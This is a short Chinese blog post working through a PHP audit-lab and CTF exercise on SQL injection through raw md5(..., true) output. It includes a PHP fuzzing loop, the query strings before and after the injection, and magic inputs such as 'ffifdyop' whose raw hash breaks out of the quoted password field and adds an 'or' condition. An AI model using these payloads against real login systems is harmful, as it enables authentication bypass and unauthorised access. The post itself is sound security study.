PHP-Audit-Labs–Day17-实例

博主觉得这个实例很有趣,就单独开一篇

给我们提供的思路很有趣

参考:https://github.com/hongriSec/PHP-Audit-Labs/tree/master/Part1/Day17/files

利用md5后字符最后一个是 \ 注释引号 逃逸出后面的or 1=1

fuzz 1-1000 发现 md5函数 为true

<?php
for($i=0; $i<=1000; $i++){
$m=md5($i,true);
echo $i."+".$m."<br>";
}


原先:

select * from users where password=’md5(128,true)’ and user=’ or 1=1#’

变成了:

select * from users where password=’****\’ and user=’ or 1=1#’

例题2

实验吧的一道题


ffifdyop129581926211651571912466741651878684928

or dnfjsnd

or ( 除了 0、’0’、false、null ,其余结果都为真 )


2019.1.26

发表评论

电子邮件地址不会被公开。 必填项已用*标注